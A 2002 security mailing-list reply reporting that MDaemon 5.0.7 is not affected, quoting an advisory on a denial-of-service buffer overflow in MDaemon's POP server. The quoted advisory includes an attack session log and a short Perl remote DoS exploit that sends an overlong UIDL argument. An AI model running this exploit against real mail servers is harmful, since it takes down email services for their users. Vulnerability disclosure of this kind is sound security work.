[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[VulnDiscuss] Re: MDaemon SMTP/POP/IMAP server DoS



5.0.7 not vulnerable (tested on registered pro server). tested dele and uidl
both with over 40b of 1.

-Karl Pietri
----- Original Message -----
From: "D4rkGr3y" <grey_1999@xxxxxxx>
To: <bugtraq@xxxxxxxxxxxxxxxxx>; <submissions@xxxxxxxxxxxxxxxxxxxxxxx>;
<vulnwatch@xxxxxxxxxxxxx>
Sent: Sunday, October 27, 2002 11:49 AM
Subject: MDaemon SMTP/POP/IMAP server DoS


> ######################################################
> #Product: MDaemon SMTP/POP/IMAP server               #
> #Authors: Alt-N Technologies Ltd [www.mdaemon.com]   #
> #Vulnerable versions: v.6.0.7 and bellow             #
> #Vulnerability: buffer overflow                      #
> #Bug&exploit by D4rkGr3y [www.dhgroup.org]           #
> ######################################################
>
> #Overview#--------------------------------------------------------------#
> From MDaemon's help file:
> "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
> commonplace on UNIX hosts and the Internet to Windows based servers
> and microcomputers. MDaemon is designed to manage the email needs of
> any number of individual users and comes complete with a powerful set
> of integrated tools for managing mail accounts and message formats.
> MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
> with LDAP support, an integrated browser-based email client, content
> filtering, spam blockers, extensive security features, and more."
>
> #Problem#----------------------------------------------------------------#
> Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by
> sending long arguments (32b and above) with DELE or UIDL commands.
> To do this u must have at least mail-account on vulnerable host.
> After geting long request from client, all MDaemon's Services will be
> closed (smtp, imap, pop, (?)worldclient).
> Here the log of attack on local MDaemon POP-server:
>
> +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
<MDAEMON-F200210
> 271036.AA3656130MD0012@xxxxxxx>
> USER D4rkGr3y
> +OK D4rkGr3y... Recipient ok
> PASS cool-pass
> +OK D4rkGr3y@xxxxxxx's mailbox has 1 total messages (18356 octets).
> UIDL 11111111111111111111111111111111
>
> Connection to host lost...
>
> #Exploit#----------------------------------------------------------------#
>
> #!/usr/bin/perl
> #MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
> use IO::Socket;
> $host = "[vuln_host]";
> $login = "[login]";
> $pass = "[pass]";
> $port = "110";
> $data = "1";
> $num = "32";
> $buf .= $data x $num;
> $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "tcp", Type => SOCK_STREAM)
> or die "Couldn't connect: @!\n";
> print $socket "USER $login\n";
> print $socket "PASS $user\n";
> print $socket "UIDL $buf\n";
> close($socket);
>
> #EOF
>
> Best regards               www.dhgroup.org
>   D4rkGr3y                    icq 540981
>
>
>